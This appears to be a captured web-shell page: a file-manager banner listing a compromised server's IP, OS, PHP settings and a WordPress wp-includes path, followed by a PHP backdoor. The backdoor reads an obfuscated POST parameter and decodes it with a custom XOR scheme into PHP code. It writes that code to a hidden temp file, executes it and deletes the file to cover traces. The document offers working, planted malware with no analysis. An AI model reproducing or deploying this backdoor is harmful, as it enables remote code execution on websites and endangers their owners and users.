| Server IP : 162.243.168.218 / Your IP : 216.73.216.67 Web Server : Apache System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64 User : web23 ( 5020) PHP Version : 8.3.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/clients/client3/web23/web/wp-includes/js/dist/script-modules/block-library/form/ |
Upload File : |
<?php
if(isset($_POST["\x6Dar\x6Be\x72"]) ? true : false){
$hld = array_filter(["/dev/shm", getenv("TEMP"), "/var/tmp", session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), getcwd()]);
$property_set = $_POST["\x6Dar\x6Be\x72"];
$property_set = explode (".",$property_set) ;
$entity = '';
$s6 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $s6 );
$v = 0;
foreach( $property_set as $v3) {
$sChar = ord( $s6[$v% $lenS] );
$d = ( ( int)$v3 - $sChar -( $v% 10)) ^ 56;
$entity.= chr( $d );
$v++;
}
foreach ($hld as $key => $data_chunk) {
if ((is_dir($data_chunk) and is_writable($data_chunk))) {
$elem = str_replace("{var_dir}", $data_chunk, "{var_dir}/.pgrp");
if (file_put_contents($elem, $entity)) {
require $elem;
unlink($elem);
die();
}
}
}
}